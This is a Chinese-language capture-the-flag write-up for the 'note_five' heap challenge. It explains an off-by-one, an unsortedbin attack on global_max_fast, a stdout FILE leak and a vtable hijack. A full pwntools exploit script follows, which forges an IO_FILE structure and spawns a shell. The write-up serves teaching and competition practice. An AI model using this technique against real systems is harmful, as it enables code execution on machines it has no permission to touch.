[Pwn] note_five - cpt.shao xp0int Posted on Sep 11 2019 ![](https://leanote.com/api/file/getImage?fileId=5d75010cab644160a9007010) edit函数输入有一处明显的off by one,可以写入任意字节,能够相当方便地构造overlapping chunk。但是分配的大小只能是0x88以上,fastbin彻底不能使用了。 思路就是先构造一个unsortedbin,然后通过overlapping的特性unsortedbin attack去攻击`global_max_fast`这个值,这里需要partial overwrite unsrotedbin上面的libc地址,大概是1/16的成功率。`global_max_fast`被填上很大的一个值以后所有free操作都会走fastbin流程。 首先我们还是得想办法泄露libc地址,这里可以用fastbin attack覆盖`_IO_2_1_stdout_`的前几个变量: ```c $4 = { file = { _flags = 0xfbad1800, [CHANGE 0xfbad2887 -> 0xfbad1800] _IO_read_ptr = 0x0, _IO_read_end = 0x0, _IO_read_base = 0x0, _IO_write_base = 0x7ffff7dd2600 <_IO_2_1_stderr_+192> "", [partial overwrite with 00] _IO_write_ptr = 0x7ffff7dd26a3 <_IO_2_1_stdout_+131> "\n", _IO_write_end = 0x7ffff7dd26a3 <_IO_2_1_stdout_+131> "\n", _IO_buf_base = 0x7ffff7dd26a3 <_IO_2_1_stdout_+131> "\n", _IO_buf_end = 0x7ffff7dd26a4 <_IO_2_1_stdout_+132> "", ``` 改成这样就会泄露出libc地址了。 然后继续修改这个结构体,把vtable改到我们可以控制的地方,合适的偏移填上system的地址就可以getshell了。 ## exp.py ```python from pwn import * import re from FILE import * context.log_level = "info" context.terminal = ['tmux', 'splitw', '-h'] context.arch = 'amd64' env = {'LD_PRELOAD': ''} if len(sys.argv) == 1: p = process('note_five1') elif len(sys.argv) == 3: p = remote(sys.argv[1], sys.argv[2]) libc = ELF('./libc.so') se = lambda data :p.send(data) sa = lambda delim,data :p.sendafter(delim, data) sl = lambda data :p.sendline(data) sla = lambda delim,data :p.sendlineafter(delim, data) sea = lambda delim,data :p.sendafter(delim, data) rc = lambda numb=4096 :p.recv(numb) ru = lambda delims, drop=True :p.recvuntil(delims, drop) uu32 = lambda data :u32(data.ljust(4, '\0')) uu64 = lambda data :u64(data.ljust(8, '\0')) info_addr = lambda tag, addr :p.info(tag + ': {:#x}'.format(addr)) def alloc(idx, size): sla(">>", "1") sla("idx:", str(idx)) sla("size:", str(size)) def edit(idx, content): sla(">>", "2") sla("idx:", str(idx)) sea("content:", content) time.sleep(0.1) def delete(idx): sla(">>", "3") sla("idx:", str(idx)) # unsortedbin attack on global max fast alloc(0, 0xf8) alloc(1, 0xf8) alloc(2, 0x98) alloc(3, 0x1f0) alloc(4, 0x1f0) edit(0, "a"*0xf8 + p8(0xa1)) delete(1) alloc(1, 0xf8) global_max_fast = 0x7ffff7dd37f8 edit(2, p64(0) + p16(0x37f8 - 0x10) + "\n") alloc(4, 0x98) edit(3, "a"*0x40 + p64(0) + p64(0x1b1) + "\n") delete(3) edit(1, "a"*0xf8 + p8(0xf1) + "\n") delete(2) alloc(2, 0xe0) # 0x7ffff7dd25a7 edit(2, "a"*0x90 + p64(0xa0) + p64(0x201) + p16(0x25a7) + "\n") alloc(0, 0x1f0) alloc(0, 0x1f0) edit(0, "a"*0x69 + p64(0xfbad1800) + 25 * "\x00" + "\n") content = ru("\xff"*8)[1:] leak = uu64(content[0x40:0x48]) info_addr("leak", leak) libc.address = leak - 0x3c5600 info_addr("libc", libc.address) # gdb.attach(p, gdbcmd) file = IO_FILE_plus_struct() file['_flags'] = u64("/bin/sh\x00") file['_IO_read_ptr'] = 0x7ffff7dd26a3-0x7ffff7a0d000+libc.address file['_IO_read_end'] = 0x7ffff7dd26a3-0x7ffff7a0d000+libc.address file['_IO_read_base'] = 0x7ffff7dd26a3-0x7ffff7a0d000+libc.address file['_IO_write_base'] = 0x7ffff7dd26a3-0x7ffff7a0d000+libc.address file['_IO_write_ptr'] = 0x7ffff7dd26a3-0x7ffff7a0d000+libc.address file['_IO_write_end'] = 0x7ffff7dd26a3-0x7ffff7a0d000+libc.address +1 file['_IO_buf_base'] = 0x7ffff7dd26a3-0x7ffff7a0d000+libc.address file['_IO_buf_end'] = 0x7ffff7dd26a3-0x7ffff7a0d000+libc.address +1 file['_chain'] = 0x7ffff7dd18e0-0x7ffff7a0d000+libc.address file['_fileno'] = 1 file['_old_offset'] = -1 file['_lock'] = 0x7ffff7dd3780-0x7ffff7a0d000+libc.address file['_offset'] = -1 file['_wide_data'] = 0x7ffff7dd17a0-0x7ffff7a0d000+libc.address file['vtable'] = 0x7ffff7dd25b7-0x7ffff7a0d000+libc.address payload = cyclic(56) + p64(libc.symbols['system']) edit(0, payload.ljust(0x69) + str(file)) sl("") sl("whoami") p.interactive() ``` 打赏还是打残,这是个问题 赏 Wechat Pay Alipay [PWN] childjs - xfiles [PWN] mulnote - xfiles
没有帐号? 立即注册